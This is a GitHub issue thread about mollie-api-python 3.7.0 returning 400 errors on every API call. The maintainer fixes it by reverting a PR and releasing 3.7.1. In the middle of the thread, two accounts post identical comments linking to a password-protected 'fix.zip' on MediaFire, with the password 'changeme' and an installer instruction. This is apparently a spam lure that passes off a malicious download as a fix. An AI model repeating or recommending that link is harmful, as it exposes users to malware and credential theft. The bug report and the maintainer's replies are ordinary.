### ISSUE TITLE
Version 3.7.0 makes all api calls return 400

### ISSUE THREAD

**Issue by hlgrondijs** [mollie/mollie-api-python#360]
I just updated to 3.7.0 and all my request through the mollie-api-python package are returning 400 malformed request error from the mollie api.

When downgrading back to 3.6.1 (my previous version) the issues disappear.

So to reproduce:
1. Install mollie-api-python 3.7.0
2. Get customer list (just as example, all endpoints fail)
```
from mollie.api.client import Client

mollie_client = Client()

mollie_client.set_api_key(MY_API_KEY)

mlist = mollie_client.customers.list() # 400 bad request
```

3. Downgrade to 3.6.1 `pip install mollie-api-python==3.6.1`
4. 200 OK response

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by geertjanvdenbosch** [comment]
Hi @hlgrondijs,

Thanks for the heads up, we'll look into it ASAP.

**Comment by geertjanvdenbosch** [comment]
Hi @hlgrondijs, once again thanks for reporting.

I've reverted the [PR](https://github.com/mollie/mollie-api-python/pull/355) that caused the issues and created a new release, 3.7.1. 
All seems to be good now.

**Comment by hlgrondijs** [comment]
> Hi @hlgrondijs, once again thanks for reporting.
> 
> I've reverted the [PR](https://github.com/mollie/mollie-api-python/pull/355) that caused the issues and created a new release, 3.7.1. All seems to be good now.

Amazing fast response, thanks!
